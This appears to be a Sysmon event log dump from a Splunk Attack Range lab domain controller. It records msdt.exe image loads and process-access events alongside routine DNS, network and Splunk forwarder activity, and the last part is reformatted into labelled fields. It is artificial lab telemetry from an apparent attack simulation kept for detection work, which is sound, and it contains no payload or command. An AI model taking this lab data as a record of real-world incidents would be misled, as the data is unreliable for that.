13:05:49.147{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local62401- 23542300x8000000000000000100344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:54.560{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F641246DA04139D9FA35D005218150,SHA256=DCDC8156393B69A34D233EEFE71D01768455CEB46C393883E9500116DF67A90D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.226{326FD73D-A4D7-6294-7701-000000005502}5708C:\Program Files\Common Files\microsoft 
shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53350-false52.109.76.30-443https 23542300x8000000000000000100346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:55.654{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCFA0A90F8052A959FFD4E2BE817DBD,SHA256=165AFC644C0D69899F832C5C27FB8834483ED01D35120F82DDC7492002885AFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.003{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53351-false10.0.1.12-8000- 23542300x8000000000000000100348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:56.638{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16AA041D50D25DAFECA9198EEBB7F457,SHA256=70F3E5D23E889F2A08420E41EE668D465779D6BCC627182D108D1F88FAFE7208,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.253{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local64545- 23542300x8000000000000000100349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:57.732{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5C61FA085A13D00ED5A0CDA8461076,SHA256=199A04806FBADC970E239CB3D84C878F7E726E162D7FCBF312D9D34727DAAE9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:58.825{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BE740C625E6AA9724B766D076AD13F0,SHA256=D9189E4571F08E35D4D9ECF8405D6A276BEEF8A4F3A557F04EF1CF2D2958D5EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:59.919{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A2572EC9154EABE5FEDC05B95FD942,SHA256=2DB9E80AE07611609ADAE4A617CB1800FBFF6485494A8DADF82BA261FC69EF91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:57.971{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53352-false10.0.1.12-8000- 23542300x8000000000000000100352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:01.013{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80DDD4DBF581B05303504510AC477A15,SHA256=3F82BB5319A2B76AEABB59827DE591A5980D3976217F5BFB7B6179BF0F5F75BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:02.107{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE305EF6288880D0A31A54ACEA906BE,SHA256=968B81FD5283C678D2EBEABB4FBB32361739E0E2A4B3A9C1609E3A5F5F2BFD8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:03.200{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D53B8C7FF18DC8E4CB6DF4BDC33EFCE8,SHA256=C76BA053427666BA7FDB63F90D9BABF9493C0AD6BE0047BEDCEE70419CCC28EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x8000000000000000100356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:04.294{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F9D1D10B629467EC0BC71C1CD799CF,SHA256=BE99FB2D6C42CE8151DB6774AFF1A198F430F763576EBE74A1DFB3E29B7AF104,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:05.966{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:05.951{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
734700x8000000000000000100415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x8000000000000000100414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9,IMPHASH=427F18493D540CBF4092BD07A97BE51FtrueMicrosoft WindowsValid 734700x8000000000000000100413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\atlthunk.dll10.0.14393.2969 (rs1_release.190503-1820)atlthunk.dllMicrosoft® Windows® Operating SystemMicrosoft Corporationatlthunk.dllMD5=BECA5E9FA540246333036919A57B7AEF,SHA256=62C24B274B38A88C83EE122CB30142C2135953C1A26582AD003512B238CB7FC9,IMPHASH=E86BAF1A171668A11110B8975A3BDE27trueMicrosoft WindowsValid 734700x8000000000000000100412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft 
CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x8000000000000000100411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750A,IMPHASH=ADB9F71ACD4F7D3CF761AB6C59A7F1E5trueMicrosoft WindowsValid 734700x8000000000000000100410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1,IMPHASH=EB898F83C3A5D6877A523BC64B41CB06trueMicrosoft WindowsValid 10341000x8000000000000000100409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-A254-6294-1600-000000005502}13003216C:\Windows\system32\svchost.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
Sysmon records (Channel=Microsoft-Windows-Sysmon/Operational, Computer=win-dc-ctus-attack-range-994.attackrange.local), one record per line with the field names restored. Fields are separated by " | "; CallTrace is always the last field of an EventID 10 record and separates stack frames with "|". Values common to every record are stated once: Level=4, Opcode=0, Task=EventID, Keywords=0x8000000000000000, RuleName=-; Version=3 for EventID 7 and 10, Version=5 for EventID 1, 3 and 23.
Common to every EventID 7 (ImageLoad) record: ProcessGuid={326FD73D-C13D-6294-460B-000000005502}, ProcessId=6584, Image=C:\Windows\System32\msdt.exe, Company=Microsoft Corporation, Product=Microsoft® Windows® Operating System (except where a Product is given on the line), Signed=true, Signature=Microsoft Windows, SignatureStatus=Valid.
Common to every EventID 23 (FileDelete) record: ProcessGuid={326FD73D-A45C-6294-5601-000000005502}, ProcessId=6368, User=NT AUTHORITY\SYSTEM, Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe, IsExecutable=false, Archived=false - insufficient disk space.

EventRecordID=100408 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.935 | ImageLoaded=C:\Windows\System32\msftedit.dll | FileVersion=10.0.14393.4704 (rs1_release.211004-1917) | Description=Rich Text Edit Control, v8.5 | OriginalFileName=MsftEdit.DLL | Hashes=MD5=76AA789092145B52D12BF1B1E8658294,SHA256=8116A9DDDA0090327E537D1C87EE3C6A1716B6228AD20F71665F0E493ACD47EF,IMPHASH=7C36F76BEB38B735155D539BEBF60532
EventRecordID=100407 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.935 | SourceProcessGUID={326FD73D-A254-6294-1600-000000005502} | SourceProcessId=1300 | SourceThreadId=1356 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-C13D-6294-460B-000000005502} | TargetProcessId=6584 | TargetImage=C:\WINDOWS\system32\msdt.exe | GrantedAccess=0x1478 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
